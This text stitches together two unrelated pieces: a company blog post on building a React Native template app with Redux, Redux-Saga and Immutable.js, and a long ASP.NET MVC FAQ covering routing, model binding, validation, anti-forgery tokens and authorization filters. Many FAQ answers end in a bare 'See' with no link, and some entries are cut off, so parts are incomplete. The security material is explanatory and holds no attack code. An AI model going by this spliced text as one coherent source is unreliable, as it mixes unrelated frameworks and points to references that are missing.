Both open-source libraries are maintained by Facebook and a community of independent developers. React and React Native have been successfully adopted and are actively being used by a number of corporations such as Airbnb, Buffer, Bleacher Report, Feedly, HelloSign, Imgur, and Netflix.
Unlike other cross-platform development solutions (Cordova, Ionic, or Titanium, for instance) that use webviews for the graphical interface, React Native uses its native rendering APIs in Objective-C (iOS) or Java (Android), so your app renders using native views. This lets developers build nice cross-platform experiences without losing any quality in UI performance.
React Native makes Java’s “write once, run anywhere” slogan reality, except for the fact that JavaScript is used.
We’ve already been experimenting with React Native for a while; these experiments have resulted in a number of interesting components. This time, however, we’ve decided to create something really special and useful...
The Template Project
To optimize our development processes and provide our clients with high-quality products, we wanted to create a robust template app that would work properly on both platforms – Android and iOS – and that could be used as a base for our future projects. As you might have guessed, we used React Native to bring it to life.
Our React Native Template Project contains user flows that are common to almost all apps. These flows include:
Item list
Item details
The project is now available on GitHub, so you can easily check it out.
This article isn’t a detailed tutorial on how to implement these flows in React Native. On the contrary, this article reveals the basics of React Native – we’ll take a look at some regular patterns as well as helpful JavaScript libraries that can be used to create a React Native app.
React Native knowledge base
Components
If you aren’t familiar with React Native, you’ll need some basic knowledge to get through the rest of the article. This section will also give you some understanding of common development patterns and reasons why we used them in our development process. Let’s start with the basics – React Components, a concept also used in React Native.
A React.Component object is the smallest atomic unit of a graphical interface. A component takes parameters (called “props”) and returns the view hierarchy to the display via the render method.
export default class RepositoryListItem extends React.PureComponent { _onPress = () => { const {navigate} = this.props.navigation; navigate(consts.REPOSITORY_DETAILS_SCREEN, {repository: this.props.repository}) }; render() { return ( <TouchableHighlight onPress={this._onPress}> <View style={itemStyles.itemStyle} {...this.props}> <Text style={itemStyles.itemTitleStyle}>{this.props.title}</Text> <Text style={itemStyles.itemDescriptionStyle}>{this.props.description}</Text> </View> </TouchableHighlight> ) } } }
Each item in the hierarchy is a component that, in turn, takes its own props and contains other components.
With this approach, we can create an app based on modular and reusable blocks.
The component lifecycle
Each component has a lifecycle and state. Whenever these change, the Render method is invoked.
We have to control the modification of our data to prevent unnecessary rendering of the user interface. To deal with this, we chose the Redux architecture.
The Redux library
In the previous section, we explained that when you create an app using React, it’s essential to keep data in a consistent state. Redux helps us do that.
The UI state is complex – we need to manage active routes, selected tabs, spinners, pagination controls, and so on.
Managing this ever-changing state is hard. If a model can update another model, and then a view can update that model, which updates another model that, in turn, may result in another view being updated... At some point, you no longer understand what happens in your app as you lose control over when, why, and how its state changes. When a system is opaque and non-deterministic, it’s hard to reproduce bugs or add new features.
Redux offers a solution to create a single global state for the whole app; this solution is called store. Each component can initiate an action to change the store. Each component that observes the state of the store receives new data in the form of props when the store is changed.
The Saga library
Many mobile applications have to send requests to the backend or a database. These operations usually take a long time and bring side-effect data to our store; for such cases, the Redux architecture provides synchronous and consistent performance.
To optimize this process, we can use middleware, an intermediary between two events: the sending of an action and the receiving of that action by the reducer. In fact, middleware is actually a function that takes
store as an argument, returns a function that takes the
next function as an argument, and then returns another function that takes an
action as an argument.
const someMiddleware = store => next => action => { ... }
The next function plays a crucial role. We call this function when our middleware is done with the task we’ve assigned it. This function sends our actions to our reducer or other middleware. As such, we can perform asynchronous operations inside middleware.
We chose the Redux-Saga library, which allows us to create such middleware and provides useful functions to easily deal with Redux.
Redux-Saga provides the middleware function, which is implemented as a Generator function (this is a JavaScript concept that aims to make asynchronous tasks synchronous and consistent).
As we can see, using the
yield keyword (used in
Generators) and some functions from the Redux-Saga library, such as
take,
put, and
call, we can intercept actions from components, send requests to the backend, and make the process of dispatching actions synchronous and consistent.
export function* loginFlow() { while (true) { const {username, password} = yield take(actions.LOGIN_ACTION); yield put({type: actions.PROGRESS, progress: true}); yield call(authorize, username, password); yield put({type: actions.PROGRESS, progress: false}); } }
The Immutable library
Redux uses reducer functions to perform changes within the
store, so when a reducer function catches some action, it creates a new object that holds a new state. Why does this object have to be new? Because this way we can compare references to two different objects (a new object and an old object); moreover, it’s much simpler than comparing object contents.
At the very least, we have to create a new object using the Spread operator:
function todoApp(state = initialState, action) { switch (action.type) { case SET_VISIBILITY_FILTER: return { ...state, visibilityFilter: action.filter } default: return state } }
We decided to use the immutable.js library because it guarantees immutability and does much of the heavy lifting behind the scenes to optimize performance and memory consumption. Our reducer function looks like this:
export default function loginReducer(state, action = {}) { switch (action.type) { case actions.ACTION_LIST_ERROR: return state.withMutations(state => state.set('loginError', action.error)); case actions.ACTION_LIST_SUCCESS: const data = action.page === 1 ? action.list : state.get('data').concat(action.list); return state.withMutations(state => state.set('data', data)); default: return state } }
Platform-specific UI elements
As far as native UI development goes, we need to stick closely to a native platform’s rules. In other words, there should be no difference between a UI created in a native language and a UI created using React Native.
React Native has many components you can use to create great user interfaces. These components, in turn, support many style parameters that allow us to customize the look and behavior of the UI. However, these components are usually not enough to create a robust UI.
To fix this lack of native elements, we used the Native-Base library, which contains many platform-specific components.
[Platform-specific UI elements for Android]
The Native-Base library allows us to use one component for both platforms without any extra adjustments.
We can also use the power of the Flexbox container, which is an effective and flexible tool for placing UI elements. This is applicable to both React Native’s standard UI elements and elements provided by Native-Base.
What else can our template do?
We wanted to create a project that covered the majority of our use cases. However, there are also system flows that usually happen behind the scenes.
We also gathered common tasks we always face, such as string localizations, maps, animations, permissions, icons, networking, data persistence, and so on, and put them into our Template Project as well.
We studied loads of open source JavaScript libraries to find the most effective solution for this project, all of which we’ve mentioned in this article.
Our goal was to create a template that supports our most commonly used flows. We ended up with a robust app for both Android and iOS.
React Native has proved once more to be an excellent tool for creating great mobile apps in a short timeframe.
Our project is free to access on GitHub, and we hope it will be useful for you. Of course, we’re going to improve and update our template, and we’re always glad to hear any suggestions or comments from other developers. | https://yalantis.com/blog/how-we-created-a-universal-template-project-in-react-native/ | CC-MAIN-2018-09 | refinedweb | 1,557 | 55.13 |
Everyone knows that storage
growth has been at growing exponential levels for a few years now within
enterprises, and as a subset of data unstructured data is growing faster than
structured (tabular) data.
How are you handling the
unstructured data growth?
One option is via Global
Name space (GNS) (Please don’t confuse that with the old Novell IPX GNS ((Get
Nearest Server)) yes acronym reuse is fun.)
What is GNS?
Put in simple terms it will
do to file storage what DNS did for IP networking.
Or put another way GNS enables
your clients to access files w/ out knowing the exact location Or put yet another
way it’s federation of a File System (F/S).
The official industry definition
goes like this… A Global Namespace (GNS) has the unique ability to aggregate
disparate and remote network based file systems, providing a consolidated view
that can greatly reduce complexities of localized file management and
administration.
Global Namespace technology
can virtualize file server protocols such as Common Internet File System
protocol (CIFS) and the Network File System (NFS) protocols.
So, you might be asking
yourself how does global namespace help my enterprise? How many mapped drives to you have (UNIX
& Windows)? How many more mapped
drives do you need to add?
How much time
do you spend just managing mapped drives?
How much time do you spend managing file locations? How much time do you spend performing cross
mapping searches?
Now multiply that number by
the number of admins and users who perform similar work in your enterprise.
How much time do you spend working
policies and access rights to these files?
Another benefit of GNS is
the ability to tie GNS into Microsoft’s DFS to ease your administration load
there too.
You will find lots of
competitive global namespace products out there in the market for you to select
from such as (IBM SONAS, Brocade StorageX, F5 Networks, etc, just to name a few)
Happy Productivity Increase! | https://www-304.ibm.com/connections/blogs/DataCenter7/tags/windows?lang=en_us | CC-MAIN-2014-10 | refinedweb | 330 | 61.56 |
Please post corrections/submissions to the MVC Forum. Include MVC FAQ in the title.
MSDN articles with Full project samples (vb and c#) (MVC 2)
MVC Best Practices
Kazi Manzur Rashid’s MVC Best Practices (great 2 part series)
Post LINQ to SQL To SQL Questions here Post Entity Framework Questions here
Q: Should I start with MVC 1 or MVC 2?
A: ScottGu recommends MVC 2. See where he writes I would go with ASP.NET MVC 2 for a new project.
Q: How do I get started with MVC?
- Walkthrough: Creating a Basic MVC Project with Unit Tests in Visual Studio Includes a VB/C# sample. (Requires MVC 2)
- Walkthrough: Using MVC View Templates with Data Scaffolding Includes a VB/C# sample. (Requires MVC 2)
- Walkthrough: Using Templated Helpers to Display Data Includes a VB/C# sample. (Requires MVC 2)
- ASP.NET MVC 2 application in Visual Studio 2010
- How to: Validate Model Data Using DataAnnotations Attributes (Shows how to use Entity Framework with MVC) Includes a VB/C# sample. (Requires MVC 2)
- I would skip the MovieDb tutorials – 90% of the work is creating the DB, which has nothing to do with MVC.
- Understanding Action Filters or ASP.NET MVC QuickStart 7: action filters or VB version Understanding Action Filters
-
-
- About Technical Debates (and ASP.NET Web Forms and ASP.NET MVC debates in particular)
MVC 3 Blogs/Posts:
- Granular Request Validation in ASP.NET MVC 3 A++
- How do I create a template in MVC3/Razor to pass in title and content?
Razor provides a streamlined way of creating html helpers. In your page you can add the following:
@helper MyClipTemplate(string title, string content) { <div class="Clip"> <h3>@title</h3> <div class="View"> @content </div> </div> }
Then from elsewhere in the file you can just call it like a regular method: @MyClipTemplate("The title", "The content")
MVC Must Read Blogs:
- Input Validation vs. Model Validation in ASP.NET MVC by Brad Wilson
MVC 2 Blogs:
- ASP.NET MVC 2 Templates (awesome 4 part series)
- ASP.NET MVC 2: Strongly Typed Html Helpers
- How to: Validate Model Data Using DataAnnotations Attributes
- Walkthrough: Using Templated Helpers to Display Data
- Using an Asynchronous Controller in ASP.NET MVC
- Extending ASP.NET MVC 2 Templates by Kazi Manzur
-
- Enterprise Library Validation example for ASP.NET MVC 2
- ASP.NET MVC 2 Preview 2 by Phil Haack
- Client Side Validation with MVC 2 Preview 2
- Html.RenderAction and Html.Action These methods allow you to call into an action method from a view and output the results of the action in place within the view.
- ASP.NET MVC 2.0 Tutorials by David Hayden
- Using ModelMetaData in ASP.Net MVC 2 to wire up sweet jQuery awesomeness by Eric Hexter
-
MVC 2 Code Samples:
- ASP.NET MVC Extensions (these are really great for extensibility, OoC, multi-adaptor and more) <—NEW and recommended
Whats new in MVC 2 Code
There are three major new features in MVC 2, and several smaller ones (and bug fixes, of course).
Areas is a feature which allows segmentation and separation of your application, so that application features can be developed in isolation from one another (either in a single project or several).
Templated Input Helpers is a feature which can auto-generate forms and editors for your models, including allowing you to override templates (for example, if you always want dates edited on your site to include a drop-down Javascript calendar).
Pluggable Validation with Client-Side Validation Support allows users to get client-side validation support with jQuery Validation and DataAnnotations attributes out of the box, and supports a pluggable API to replace both client-side and server-side pieces.
You can see the ASP.NET MVC 3 Roadmap on our CodePlex site.
Stephen Walther on ASP.NET MVC
Good Tutorials
Get The Drop On ASP.NET MVC DropDownLists
Drop-down Lists and ASP.NET MVC
Adding Multiple Nested Data in ASP.NET MVC Application
Performing Validation in an ASP.NET MVC Application
Populating Hierarchical Data Using Model Binders in ASP.NET MVC Application
ASP.NET MVC Framework and JavaScript BFFF!
Creating ASP.NET MVC Helpers
Good Overviews
- The Life And Times of an ASP.NET MVC Controller
- The Life of an ASP.NET MVC Request
- ASP.NET MVC QuickStart 8: partial updates using jquery
- Using jQuery Grid With ASP.NET MVC
Awesome MVC Blogs
-
- Encrypted Hidden Inputs in ASP.NET MVC
-
- Stephen Walter’s MVC blogs.
-
-
-
- Kazi Manzur Rashid’s Blog
-
- Passing anonymous objects to MVC views and accessing them using the new c# dynamic keyword
- TempData and DropDownList in ASP.Net MVC
- Session and Pop Up Window
- ASP.NET MVC 2 Optional URL Parameters Phil Haack
Client side Validation
Q: What’s the difference between ResolveUrl and Url.Content and why should I favored the later ?
A: Url.Content is preferred because it will work with WebForms, Razor or any custom View Engine. While ResolveUrl only works in Web Form View Engine. Url.Content() generates correct subdomain-relative link. ResolveUrl() will generate an incorrect link. see
Must read on CDN usage: See
Routing
Route data vs. Model data – who wins?
Q: If we have in route defined parameter with same name as property at model and then we call it from strongly typed HTML helper (for example Html.TexBoxFor(x => x.PropertyName)), we get value from route parameter instead of property of model.
A:. For a complete example see.
Using outputCache with RenderAction and Partial View – see
implicit [Required] and value types – see
[HttpPost] is shorthand for [AcceptVerbs(HttpVerbs.Post)]. The only difference is that you can’t use [HttpGet, HttpPost] (and similar) together on the same action. If you want an action to respond to both GETs and POSTs, you must use [AcceptVerbs(HttpVerbs.Get | HttpVerbs.Post)].
Good Route Blogs/Threads
-
-
- Creating a Route Constraint (C#) — VB version
Q: My viewModel has user=Haacked but the view displayed from http:/localhost/home/JoeSmith shows user=JoeSmith, not Haacked as I expected.
A: See this excellent thread on ModelState.
Q: Why doesn’t the following route work “{controller}/{action}/{alias}#{anchor}”.
A: Fragments can’t be put into routes. Instead, using a link generator which takes the fragment as a parameter:
Comment: Routing supports optional parameters and catch-all parameters: Optional parameters let you chop off unused parameter segments at the end of the URL, but you cannot have optional parts removed from the middle of the URL. Catch-all parameters let you include all remaining URL segments at the end of a URL, but then it’s up to you to split it out into individual values.Without routing at all you can use query strings, in which case the key-value pairs are all optional with respect to the URL.
Q: Linq to SQL or Entity Framework?
A: If you’re building a new application, we recommend that you start with the Entity Framework rather than LINQ to SQL.
We continue to invest in both the Entity Framework and LINQ to SQL in .NET 4.0 and beyond. In .NET 4.0, we made a number of performance and usability enhancements to LINQ to SQL, as well as updates to the class designer and code generation. We will add new features as customer needs dictate, but we & data sources. See also
Q: How do I get the name of the current controller and action in a view?
A: override OnActionExecuting() and access ViewData + RouteData – See
Q:Output Caching For Several Client IP’s
A: See
Q: How do I EnableClientValidation for only some forms on a page?
A: <% ViewContext.ClientValidationEnabled = false; %>
Call this before the form(s) for which you want to disable validation. If you want to re-enable later in the page, just call EnableClientValidation() again (or set that property to true). See
Q: How do keep values of model’s unused members during update? *****
A: Stick a [Bind(Exclude = "CreatedByUserId")] attribute on the model type. This will prevent the binder from ever attempting to set that property. See
Q: Why was Default.aspx removed from MVC 2?
A: Default.aspx file should only be needed when running in IIS6 or in IIS7 Classic Mode. Neither Cassini (the built in VS web server) nor IIS7 Integrated Mode (the default) need default.aspx. The reason we took Default.aspx out is that there are many steps required to get ASP.NET MVC to work on IIS6 and IIS7 Classic Mode and having Default.aspx in the project doesn’t help very much anyway since there are so many other steps.
Q: MVC is not working with GridView/ListView
A: ASP.NET MVC does not support data sources and does not support the GridView. If this is your preferred method of programming, you should use ASP.NET WebForms. Alternatively consider the Telerik ASP.NET MVC Grid
Q: MVC or Web Forms?
- ScottGu on Web Forms v. MVC
- article by shiju varghese
- and a question on SO
-
-
-
-
Q: WebForms vs. MVC on pipeline events (not Page pipeline events).
All of the real(ie, not page) ASP.NET pipeline events will happen in exactly the same manner regardless of which UI framework you use. In other words, if you have a module that hooks up events you can be confident that it will work just fine for MVC and for Web Forms.
Q: ViewData v. tempData
Q:How do I figure out route order?
A:Use Phil Hacck’s route debugger – Also see Manually unit testing routes in ASP.Net MVC
Q: What is the correct way to write a delete action?
A: See
-
-
-
Q: How do I bind my model to a List?
A: See Phil’s blog Model Binding To A List
Q: My jQuery/JSON works fine on my machine, but doesn’t work on the server.
A: Your URLs are not getting resolved correctly. See
Q: How can I find memory leaks and profile memory usage of my MVC app?
A: Use the CLR Profiler:
Thomas M. has a nice blog of how to use the profiler with ASP.NET:
Q: I have a view where the user fills out a form, submits and the data is displayed on a confirmation page. They must submit the confirmation page before the DB is updated (or their credit card is charged). The problem is, the confirmation page is nothing but text; so when they submit that View, nothing will be passed to the controller. The controller has no way of knowing what information the user entered 2 views ago.
A: The easiest thing to do would be to shove it into Session (if Session is enabled). Otherwise use hidden input fields or the Html.Serialize() helper from Futures. Absolutely do not use TempData for this. Hidden form fields is the right answer for scalability reasons. TempData is the wrong reason because if the user refreshes the confirmation page, then the TempData will be destroyed. Also, if Session is disabled, then the default TempData provider is also broken (since it’s based on session).
Q: I’m trying to pass my custom object via RedirectToAction and it’s not working, why?
A: RedirectToAction() works by shoving data into the URL. Since an AbcFilter can’t be put into the URL, this doesn’t work. Try using TempData for this instead: See
Q: Can MVC 1 be installed on Visual Studio 2010?
A: No, VS2010 is not compatible with MVC 1.0. For that you will need to stick with VS 2008. See
Q: In my custom view engine, ViewLocationCache is always empty, why?
A: See
Q: Is there a way to precompile MVC application including code and views for deployment?
A: You need to install the Visual Studio Web Deployment add-in (see) In your MVC solution, right click on the MVC project and select "Add Web Deployment Project…" (thanks to Jacques) — running the command line utility using aspnet_compiler will also do the job. The command line is:(framework directory)\aspnet_compiler -v /virtualDirName outputdirectoryName
Q: I’m using partial views and jQuery. When I use jQuery to do the post and updates to the page my javascript fires as I would expect. If i let Ajax.BeginForm handle it the javascript doesn’t execute. Why?
A: When you update the DOM with new HTML, the browser doesn’t automatically execute scripts in the new bit of HTML. MVC Ajax helpers would need to parse the partial HTML and try and execute the scripts, which is tricky and something we don’t currently do.
One approach you could take is to look at jQuery live events. – source ‘
JQuery and partial views in an ASP.NET MVC application
Combine/Compress/Minify JS and CSS files in ASP.NET MVC
How to load partial view dynamically in ASP.NET MVC using JQuery
Q: How do I mix Web Forms and MVC?
A: see
Q: Is it possible use an enums in a controller action method?
A: Yes – See
Q: What does the following do:
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.IgnoreRoute("{resource}.aspx/{*pathInfo}");
A: Tells the routing engine to ignore request that end in .axd or .aspx (.aspx needed for MVC on IIS6)
Q: Invalid viewstate exception when using AntiForgeryToken error on Hosted site.
A: You can read more here: How To Fix the: “Validation of viewstate MAC failed” Error (ASP.NET MVC)
Q: Can open generic methods be used with controlers?
A: Do you mean an open generic method, such as:
public class MyController : Controller {
public ActionResult SomeAction<T>(T myParameter) { … }
}
Or a method that is generic on a class:
public class MyController<T> : Controller {
public ActionResult SomeAction(T myParameter) { … }
}
Example #1 is not supported in ASP.NET MVC because we don’t know the type of "T". Example #2 is technically supported in MVC since by the time we get to the method we already know what the "T" is. However, the default controller factory in ASP.NET MVC cannot construct generic classes. If you have a controller factory that can create MyController<T> then ASP.NET MVC can call the action method on it.
Q: I thought the default http handling was synchronous, but that’s not the behavior I’m seeing.
A: With the addition of AsyncController in MVC2, the MvcHandler class needs to be an IHttpAsyncHandler now, which means that as far as the ASP.NET core runtime is concerned, the entry points are now BeginProcessRequest and EndProcessRequest, not ProcessRequest. See
Q- Why is Html.ValidationSummary is inconsistent in my app.
A: Validation happens during model binding, either implicit binding via action parameters or explicit binding via calls to (Try)UpdateModel.
Q: How do I preserve HTML in error messages?
A:You’re likely going to be more interested in the workings of Html.ValidationMessage() and our other helpers rather than the workings of AddModelError(). AFAIK all of the UI helpers encode their output, so HTML like <br /> will always be rendered as <br />.
If you want to display the error messages as HTML, you’ll have to create a new helper like Html.FormattedValidationMessage() which is based off of Html.ValidationMessage() but doesn’t encode the data. Take a look at the source for Html.ValidationMessage() and you’ll find that it’s not a very complex method. It should be fairly straightforward to copy that code into a new method that leaves out the line that does the HTML encoding.
See (this thread also shows the wrong way to implement error messages with HTML, the wrong approach opens you up to a potential cross-site scripting attack
Q: I added a new field to my model – I did not mark it required but when I don’t include it on submit/Post – ModelState.IsValid is false and I get an error "the field value is required."
A:Properties of non-nullable types are by definition mandatory, even without [Required]. A value ("", which we convert to null) is submitted back to the server, and we can’t convert that value to an Int32, so binding fails. If you need a field to be optional, you should make it nullable. In that case, we can successfully store a null value in the property.
Q: Ho do I create a general validation attribute for checking uniqueness in a linq to sql data context?
A: See
Q: What’s the correct way to get the controller name and action from an httpContext object?
A: You can’t; you require at minimum a RequestContext object. If you have a RequestContext object, you can call RouteData.GetRequiredString("controller") / GetRequiredString("action").
Q: My MVC app has a class with that initializes a variable ( DateTime.Now in this case). This value seems to be cached. WHat’s going on here?
A: HttpApplication instances are cached and reused but the value of the variable is indeterminite because the the constructor can run again at any moment. See
Q:How do I use partial views to display data on every page using site.master? is it necessary for every controller to deliver the model-data?
A: Yes, OR If you’re using ASP.NET MVC 2, You can use RenderAction instead of RenderPartial. This will allow you to centralize the data collection and partial view into a mini-action.
Q: I’m not getting the validation error message I specify.
A: It could be what you’re talking about here isn’t validation, but model binding failures. You can use resources for this message. See
Q: System.EntryPointNotFoundException: Entry point was not found. when unit testing html helpers
A: See
Q: query string parameters and view model fields binding problems?
A: See
Q: When I upload large files I get a HTTP 404 error.
A: I fixed it by just maxing out the maxRequestLength value and not setting any other property values.
<httpRuntime maxRequestLength="2097151"/> See also
Q: How do I call halt the MVC pipeline when my controller has an exception? How do I call Response.End()?
A:Response.End() is not supported in MVC 2 / 3. Instead, what you can do is throw an HttpException, passing to the constructor the HTTP status code you want. This will halt control flow of the application.
Q: Is there a VB.Net equivalent to the "<dynamic>" attribute of a C# based view?
A: Turning "option strict" off. VB.NET can also use the new "dynaming" type, but it doesn’t work in medium trust in VB.NET, so we recommend people turn off option strict instead..
ASP.Net Development server (from Visual Studio) AKA Cassini eats the status description. You need to test this with a real IIS server. See
Binding
Q: I’m trying to use DataAnnotations to force an input field to the right type – but when the wrong data type is entered I don’t get the error message I used in my DataAnnotations , I get the error “value is not valid for this field", and the value is null, not the incorrectly entered data.
A: Validation attribute are applied after model binding. The message you see comes from the model binder when it catches a wrong format exception generated by the converter. For more info see
Q: I am unable to get value for Html.TextBoxFor(m = > m.name) in view.
A: This value is only automatically maintained if the value is retrieved via model binding. It’s the model binding process which puts the current value into ModelState, which is how we automatically round-trip things. If you don’t somehow model bind "name", then the value won’t be preserved. You either need to model bind it, or set the value into ModelState by hand. see
Q: If a have a Html.TextBoxFor input field in my view bind to a property called test on my viewmodel…When changing this value in the post action in the controller and then returning View(viewModel), the value is discarded!
A: You can override this behavior by removing the ModelState entry for the property. All the HTML helpers get the previously posted value for re-display from the ModelState dictionary.
Debug
Q: The VS 2010 debugger is showing the following exception "This property cannot be set to a null value." – But when I run the code outside of Visual Studio I don’t see the error.
A:This is expected behavior. Internally, MVC is setting the model’s ISBN property to null. This is triggering EF validation within the property setter and is throwing an exception. MVC swallows this exception and moves on to the next property of the model.
You’ll see the debugger activate on this exception if you have Visual Studio set up to break on CLR exceptions (via the menu Debug -> Exceptions). If you’re not running under a debugger or don’t have the debugger configured to pause on exceptions, you won’t see this exception. Hitting F5 (to continue) from within the debugger will allow program execution to continue as normal. – See
security
Q: How do I hide sensitive information from my model (Like SSN, salary, etc)?
A: What most developers do is store an identifier instead of the actual sensitive data. For example, if you’re updating an Employee (from the table Employees), each Employee might contain sensitive information like the tax identification number, salary, family members, etc.
Instead, one option is to send a single hidden field containing only the employee id (which presumably isn’t sensitive information). When the action executes, it reads this hidden field to perform an Employee lookup by number against the database. Now the action has access to all of the sensitive information without having exposed it in the form.
If you go this route, you’ll have to take some other precautions. For example, you’d have to verify that the person submitting the form actually has access to that particular Employee record (otherwise they could tamper with the EmployeeId field in the form). You’ll also have to prevent over-posting if you’re binding directly to an Employee object. (This latter point is why I always implore people not to bind directly to their database models, but instead to use view-specific models and map them to database models as necessary.)
Q: How does <authorization> <allow roles="SomeRole"/> in web.config work in MVC
A: In MVC, your resources are controllers, not URLs. So if you wanted to restrict access to an entire AdminController, for example, you’d put[Authorize(Roles = "Administrator")] on the controller class.
If you need to secure a group of controllers, put the attribute on a AdminControllerBase class, then have each controller you need to secure subclass that type. The framework will automatically apply the attribute to the subclassed types.
In ASP.NET MVC this is done with a special kind of filter namely IAuthorizeFilters. If you define them on controller level you define them for all your actions and if you have a base controller you define them for all controllers that are derived from this base controller. see
HTML Encoding extensibility
Q: I have a situation where I need a finer grain security within my page than what is available with forms authentication, membership and roles.
A: See
Q: I have multiple tabs open to a web site. When I close one tab, Formsauthentication doesn’t clear.
A: What is the particular problem you’re trying to solve here? "I need to log a user out when he closes a browser tab" isn’t a problem; it’s a means to an end. Why do you need to log the user out when he closes the tab? If you back up to the original problem, perhaps we’ll all find another way to solve it.
In general, browsers store temporary cookies (including the ASP.NET FormsAuthentication cookie) for the entire lifetime of the browser process. Since closing a tab doesn’t kill the browser process itself, the temporary cookie sticks around until the browser is fully closed. So if within the same browser process you open a new tab and visit your web site, the browser will send the temporary cookie to the site. This isn’t a flaw or a failure; this is just how cookies work. See
Q:.
A:
Is your component fully trusted and you want to prevent partial trust code from accessing it? If so, just wrap the object to be stored into Items in a type that’s internal to your application, and protect the class with a demand:
view plaincopy to clipboardprint?
1. [PermissionSet(SecurityAction.LinkDemand, Name="FullTrust")]
2. internal sealed class MyWrapper {
3. internal object WrappedObject;
4. }
.
See
Q: How do I create an authorize filter that take parameters?
A: See
Q: Why is a " A required anti-forgery token was not supplied or was invalid" Exception thrown when I follow the sequence:
- Login (Successful)
- Go back (via browser back button)
- Login (Exception)
with
1. [HttpPost]
2. [ValidateAntiForgeryToken]
3. public ActionResult Login(LoginModel loginModel, string returnUrl)
4. {
5. // validate login, set authcookie
6. }
A: This behavior is correct. The anti-forgery tokens are tied to specific users (or the ‘guest’ user if the current user is not logged in). The first time the form is generated, the user is not logged in, so a token is generated for the user GUEST. The user hits the login button, the token validates correctly (since the user has not yet been logged in), your controller logs the user in, and life is good. Let’s assume he logged in as JOE.
Now, if the user hits the back button, he’ll be taken back to the original form. (More specifically, he’ll see the cached version of the original form, complete with GUEST token.) When he tries to submit the login again, the GUEST token cannot be used for a request coming from JOE, so the system rejects the token.
This is pretty much the same behavior you’ll see at some banking and other web sites, many of which don’t allow you to use the back button once you’ve logged in. Their tokens follow a similar pattern of being tied to a specific user, and if an old token is used with a logged-in user they will fail.
Presumably this shouldn’t be problematic, as the particular scenario under consideration (submitting the exact same form under two different identities) isn’t something most users do and isn’t something that’s always expected to work properly. If this is however a problem for you, you could remove [ValidateAntiForgeryToken] from the Login() action.
Q2 (continued): if I create a custom ActionFilter it does not fire before the ValidateAntiForgeryToken.
A: ValidateAntiForgeryTokenAttribute is an authorization filter (it implements IAuthorizationFilter), while your filter is a regular action filter (it implements IActionFilter and IResultFilter via subclassing ActionFilterAttribute). Authorization filters are always executed before action filters, regardless of ordering. Ordering can only be used to order authorization filters relative to other authorization filters, action filters relative to other action filters, etc.
Instead, your filter should subclass FilterAttribute (instead of ActionFilterAttribute) and implement the IAuthorizationFilter interface. From the OnAuthorization() method, perform the necessary check + redirect. Since both your attribute and the [ValidateAntiForgeryToken] filter are authorization filters, their Order properties will be respected.
Filter execution is grouped by filter type: authorization filter, action filter, response filter, and exception filter. *All* of the authorization filters go first, then *all* of the action filters, then *all* of the response filters. Within these particular groups, ordering is determined by the rules detailed at (Order of Execution for Action Filters). By the rules detailed at this article, the Controller.OnAuthorization() method will execute before any authorization filter, regardless of the filter’s Order. For more details see
The [RequireHttps] attribute can be used on a controller type or action method to say "this can be accessed only via SSL." Non-SSL requests to the controller or action will be redirected to the SSL version (if an HTTP GET) or rejected (if an HTTP POST). You can override the RequireHttpsAttribute and change this behavior if you wish. There’s no [RequireHttp] attribute built-in that does the opposite, but you could easily make your own if you desired.
There are also overloads of Html.ActionLink() which take a protocol parameter; you can explicitly specify "http" or "https" as the protocol. Here’s the MSDN documentation on one such overload. If you don’t specify a protocol or if you call an overload which doesn’t have a protocol parameter, it’s assumed you wanted the link to have the same protocol as the current request.
The reason we don’t have a [RequireHttp] attribute in MVC is that there’s not really much benefit to it. It’s not as interesting as [RequireHttps], and it encourages users to do the wrong thing. For example, many web sites log in via SSL and redirect back to HTTP after you’re logged in, which is absolutely the wrong thing to do. Your login cookie is just as secret as your username + password, and now you’re sending it in cleartext across the wire. Besides, you’ve already taken the time to perform the handshake and secure the channel (which is the bulk of what makes HTTPS slower than HTTP) before the MVC pipeline is run, so [RequireHttp] won’t make the current request or future requests much faster.
Q: How do I create an authorize filter in asp.net mvc?
A: See
Q: How do I create a single custom authorization attribute to be added to controller actions that require authenticated users.
A:. See for more details
Force MVC Route URL to Lowercase and
Q: How does ModelMetadata work? How does Html.Editor() get metadata?
A: See
Q: How do I move the authorization out of being hard-coded in the app and into a DB table where it can then be administered by the apps admin functions?
A: See
Q: How do I generate HTTPS URLs?
A:
Q: How do you get a redirect to send an HTTP POST instead? This is necessary for passing control to PayPal’s payment page.
A: See
SECURITY
Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVC’s AntiForgeryToken() helper Steven Sanderson’s awesome MVC CSRF blog posting.
Q:How Can I Create A secure Form URL?
A:
Q: I have a custom Authorize attribute, which implements OnAuthorization. In the default OnAuthorization, an HttpUnauthorizedResult is set when there is an authorization failure. Can I intercept this ActionResult somewhere and take a specific action based on it. I do not want to put all the redirection logic etc. in OnAuthorization
A:In general your subclassed AuthorizeAttribute should not override OnAuthorization(). Override HandleUnauthorizedRequest() instead and set the filterContext.Result property as appropriate from within that method.
Q: How do I prevent a user from sending us confidential data (credit card number, SSN, etc.) over an unsecured channel (HTTP)?
A: You can’t. If the user sends confidential data via HTTP you can’t go back in time and undo the transmission. Action methods that handle posts of confidential data should use the [RequireHttps] Attribute; the action method will ignore the post and force the sender to use HTTPS.
Q: Will the [RequireHttps] Attribute prevent Man in the Middle Attacks (MITM) or DNS cache poisoning attacks?
A: The [RequireHttps] Attribute can’t prevent MITM or DNS cache poisoning attacks, but HTTPS in general does protect against these.
Q: How do I intercept HttpUnauthorizedResult() when it’s set in OnAuthorization?
A: In general your subclassed AuthorizeAttribute should not override OnAuthorization(). Override HandleUnauthorizedRequest() instead and set the filterContext.Result property as appropriate from within that method. See
Q: How do I handle exceptions in a View?
A: You can use elmah. Check out this article : and go to How to wire this up in ASP.NET MVC section for more info.
[HandleError] will catch exceptions from views and HTML helper methods. But since you can only put it on a controller or an action, it’s not global.
You can use ELMAH to do exception logging application-wide (not just within MVC) and across multiple controllers. Hanselman also wrote about this –.
Q: Switching between HTTP and HTTPS in ASP.NET MVC2
A: See
Q:i’m having the "A potentially dangerous Request.Form value was detected from the client" error
A: see.
It’s best to think of .aspx / .ascx views in MVC applications as templates rather than proper pages. The MVC framework will run the template (which might contain basic code snippets like calling helpers), but it’s not guaranteed to execute the page pipeline in any sane fashion. This implies that events might execute out of order, with uninitialized parameters, or not at all. But this is OK for MVC, since views shouldn’t be hooking such events in the first place.
The DataTypeAttribute does not contain any validation logic itself. The hooks are there for people who are writing custom data types that derive from DataTypeAttribute to not only contain the data type (and appropriate formatting information) but also validation logic.." see
